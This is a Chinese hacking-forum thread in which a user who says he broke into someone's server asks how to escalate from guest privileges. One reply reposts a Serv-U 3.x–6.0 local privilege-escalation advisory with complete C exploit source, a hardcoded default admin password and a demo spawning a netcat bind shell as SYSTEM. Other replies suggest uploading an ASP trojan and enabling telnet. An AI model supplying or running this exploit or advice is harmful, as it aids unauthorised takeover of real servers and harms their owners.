论坛: 黑客进阶 标题: 对于服务器提升权限的疑问 复制本贴地址    
作者: lhh2003 [lhh2003]    论坛用户   登录
今天下午无聊就搞了一台机子,并成功的进入了服务器,但权限有问题,怎么都是guest权限,服务器里有serv-u,我上传了提升权限的文件,但竟然不能用net use等命令添加administrator,只可以用一些dir等命令,然后看了装用pcanywhere,并连接成功,但也没有什么进展。。。求救。。。郁闷+ing.....

地主 发表时间: 04-12-21 17:18
回复: yizeyu [yizeyu]   论坛用户   登录
你可以教教我怎样进功的好吗?你知道一个黑客应该要掌握那些书籍吗??谢谢

B1层 发表时间: 04-12-21 18:49
回复: VeryBest [x1234521]   论坛用户   登录
你不是打错命令了吧
NET USER 而 不是NET USE,??
我看你上面的写的是不对,不知道你是不是实战的时候也打错了呢 `~??
一般用serv-u提升权限,只要版本正确的话,一般都会成功的,~


B2层 发表时间: 04-12-22 00:28
回复: lhh2003 [lhh2003]   论坛用户   登录
不好意思,上面打错了,刚才看了下,是6.0的,
但我不知道为什么在dos下无法打一些常用的命令,如net start ,net user,等,但dir,copy可以,浪费了我很多时间。开了3389,连接竟然是提示服务器繁忙,请稍后连接,用pcanywhere连接,连屏幕也无法显示,,,,,,,555555

B3层 发表时间: 04-12-22 01:44
回复: amr [amr]   论坛用户   登录
serv-u 最新版本也有权限提升漏洞的,好像不是用 net user 来提升权限啊

B4层 发表时间: 04-12-22 18:08
回复: uncracker [uncracker]   论坛用户   登录
有6.0的serv-U吗?

B5层 发表时间: 04-12-25 08:52
回复: amr [amr]   论坛用户   登录
Serv-U本地权限提升漏洞(Serv-U 3.X-6.0.0.0)
http://bbs.fineacer.com/ShowPost.asp?id=1040 http://www.fineacer.com/Article_Show.asp?ArticleID=3369

Serv-U本地权限提升漏洞

涉及程序:
Serv-U软件

描述:
Serv-U本地权限提升漏洞

详细:
Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件。

Serv-U存在设计问题,本地攻击者可以利用这个漏洞以SYSTEM权限在系统上执行任意命令。

所有Serv-U存在默认本地管理员登录密码,这帐户只能在本地接口中连接,因此本地攻击者可以连接Serv-U并建立拥有执行权限的FTP用户,在这个用户建立后,连接FTP服务器并执行"SITE EXEC"命令,程序就会以SYSTEM权限执行。

受影响系统:
RhinoSoft Serv-U 6.0.0.0
RhinoSoft Serv-U 5.2.0.1
RhinoSoft Serv-U 5.2.0.0
RhinoSoft Serv-U 5.0.0.9
RhinoSoft Serv-U 5.0.0.4
RhinoSoft Serv-U 5.0
RhinoSoft Serv-U 4.1.0.3
RhinoSoft Serv-U 4.1.0.11
RhinoSoft Serv-U 4.0.0.4
RhinoSoft Serv-U 4.0.0.0
RhinoSoft Serv-U 3.0.0.20


攻击方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

aT4r ins4n3 (at4r@ciberdreams.com)提供了如下测试方法:

/*
* Hax0rcitos proudly presents
* Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
*
* All Serv-u Versions have default Login/password for local Administration.
* This account is only available to connect in the loopback interface, so a
* local user will be able to connect to Serv-u with this account and create
* an ftp user with execute rights. after the user is created, just connect
* to the ftp server and execute a raw "SITE EXEC" command. the program will
* be execute with SYSTEM privileges.
*
* Copyright (c) 2003-2004 Haxorcitos.com . All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*
* Date: 10/2003
* Author: Andrés Tarascó Acunha
*
* Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
*
* Tested Against Serv-u 4.x and v6.0.0.0

G:\exploit\serv-U\local>whoami
INSANE\aT4r

G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
Serv-u >3.x Local Exploit by Haxorcitos

<220 Serv-U FTP Server v6.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=3
220 Domain settings saved
******************************************************
[+] Domain Haxorcitos:3 Created
[+] Setting New Domain Online
<220 Server command OK
******************************************************
[+] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER haxorcitos
<331 User name okay, need password.
******************************************************
>PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: nc -l -p 99 -e cmd.exe
<220 Domain deleted
******************************************************
G:\exploit\serv-U\local>nc localhost 99
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>whoami
whoami
NT AUTHORITY\SYSTEM
C:\>
*/

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>

//Responses
#define BANNER "220 "
#define USEROK "331 User name okay"
#define PASSOK "230 User logged in, proceed."
#define ADMOK "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID "200-DomainID="
//Commands

#define XPLUSER "USER haxorcitos\r\n"
#define XPLPASSWORD "PASS whitex0r\r\n"
#define USER "USER LocalAdministrator\r\n"
#define PASSWORD "PASS #l@$ak#.lk;0@P\r\n"

#define MAINTENANCE "SITE MAINTENANCE\r\n"
#define EXIT "QUIT\r\n"
char newdomain[]="-SETDOMAIN\r\n"
"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
"-TZOEnable=0\r\n"
" TZOKey=\r\n";
/* "-DynDNSEnable=0\r\n"
" DynIPName=\r\n";
*/
char deldomain[]="-DELETEDOMAIN\r\n"
"-IP=0.0.0.0\r\n"
" PortNo=2121\r\n";

char newuser[] =
"-SETUSERSETUP\r\n"
"-IP=0.0.0.0\r\n"
"-PortNo=2121\r\n"
"-User=haxorcitos\r\n"
"-Password=whitex0r\r\n"
"-HomeDir=c:\\r\n"
"-LoginMesFile=\r\n"
"-Disable=0\r\n"
"-RelPaths=1\r\n"
"-NeedSecure=0\r\n"
"-HideHidden=0\r\n"
"-AlwaysAllowLogin=0\r\n"
"-ChangePassword=0\r\n"
"-QuotaEnable=0\r\n"
"-MaxUsersLoginPerIP=-1\r\n"
"-SpeedLimitUp=0\r\n"
"-SpeedLimitDown=0\r\n"
"-MaxNrUsers=-1\r\n"
"-IdleTimeOut=600\r\n"
"-SessionTimeOut=-1\r\n"
"-Expire=0\r\n"
"-RatioUp=1\r\n"
"-RatioDown=1\r\n"
"-RatiosCredit=0\r\n"
"-QuotaCurrent=0\r\n"
"-QuotaMaximum=0\r\n"
"-Maintenance=None\r\n"
"-PasswordType=Regular\r\n"
"-Ratios=None\r\n"
" Access=c:\|RELP\r\n";

#define localport 43958
#define localip "127.0.0.1"

char cadena[1024];
int rec,domain;
/******************************************************************************/

void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
char *response) {
send(sock,data,strlen(data),0);
if (ShowSend) printf(">%s",data);
Sleep(100);
do {
rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='';
if (rec<=0) return;
if (showResponses) printf("<%s",cadena);
if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
domain=atoi(cadena+strlen(DOMAINID));
//} while (strncmp(cadena,response,strlen(response))!=0);
} while (strstr(cadena,response)==NULL);
printf("******************************************************\r\n");
}
/******************************************************************************/
int main(int argc, char* argv[])
{
WSADATA ws;
int sock,sock2;

struct sockaddr_in haxorcitos;
struct sockaddr_in xpl;

printf("Serv-u >3.x Local Exploit by Fineacer\r\n\r\n");
if (argc<2) {
printf("USAGE: ServuLocal.exe \"command\"\r\n");
printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\"");
return(0);
}

if (WSAStartup( MAKEWORD(2,2), &ws )!=0) {
printf(" [-] WSAStartup() error\n");
exit(0);
}

haxorcitos.sin_family = AF_INET;
haxorcitos.sin_port = htons(localport);
haxorcitos.sin_addr.s_addr = inet_addr(localip);
sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='';
printf("<%s",cadena);

ParseCommands(sock,USER,1,1,USEROK);
ParseCommands(sock,PASSWORD,1,1,PASSOK);
ParseCommands(sock,MAINTENANCE,1,0,"230 ");

printf("[+] Creating New Domain...\r\n");
ParseCommands(sock,newdomain,0,1,BANNER);
printf("[+] Domain Haxorcitos:%i Created\n",domain);

/* Only for v5.x
printf("[+] Setting New Domain Online\r\n");
sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n
Command=DomainOnline\r\n",domain);
ParseCommands(sock,cadena,0,1,BANNER);
*/
printf("[+] Creating Evil User\r\n");
ParseCommands(sock,newuser,0,1,"200 ");
Sleep(1000);

printf("[+] Now Exploiting...\r\n");
xpl.sin_family = AF_INET;
xpl.sin_port = htons(2121);
xpl.sin_addr.s_addr = inet_addr(localip);
sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl));
rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='';
ParseCommands(sock2,XPLUSER,1,1,USEROK);
ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
printf("[+] Now Executing: %s\r\n",argv[1]);
sprintf(cadena,"site exec %s\r\n",argv[1]);
send(sock2,cadena,strlen(cadena),0);
shutdown(sock2,SD_BOTH);
Sleep(100);
ParseCommands(sock,deldomain,0,1,BANNER);
send(sock,EXIT,strlen(EXIT),0);
shutdown(sock,SD_BOTH);
closesocket(sock);
closesocket(sock2);

return 0;
}


解决方案:

情长在线Http://Www.Fineacer.com针对此漏洞作如下建议:

1、禁止IIS匿名访问用户的EXE文件执行权限,以及对系统CMD的访问与执行权限。

2、更改SERV-U FTP服务器的本地管理连接的默认端口43958、以及用户名与密码。

3、换用其它FTP SERVER 软件 。


完整防御方案:

Serv-U3.X-6.0本地权限提升漏洞的防御方案


厂商补丁:

RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.serv-u.com/

 


B6层 发表时间: 05-01-01 14:53
回复: lhh2003 [lhh2003]   论坛用户   登录
我不会编绎,最好能帮我做好,我下载来试试就好了

B7层 发表时间: 05-01-03 12:32
回复: hackerjune [hackerjune]   论坛用户   登录
B6做啥呢?
楼猪得到了GUEST权限,知道什么意思么?
有SERV-U就可以上传个ASP木马
还有你可以可开对方的TELNET啊
你可能就是在IPC$下操作的吧`

B8层 发表时间: 05-01-03 17:12
回复: fbicn [fbicn]   论坛用户   登录
到网上找资料更好!

B9层 发表时间: 05-01-08 12:23
回复: amr [amr]   论坛用户   登录
http://www.eviloctal.com/forum/read.php?fid=24&tid=4538&fpage=1&toread=1&page=2

B10层 发表时间: 05-01-10 19:29
回复: listenwind [listenwind]   论坛用户   登录
呵呵  少熬夜 多休息  注意身体!


B11层 发表时间: 05-01-11 02:41
回复: lijingxi [lijingxi]   见习版主   登录
你自己上传一个CMD改变CMD的位置看看能不能执行命令!
还有 你尝试用别的方式提升权限 比如给IIS加上admin权限 然后执行你想执行的命令
连接不了对方的3389也许是因为对方进行了IP过滤!


B12层 发表时间: 05-01-12 11:09

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号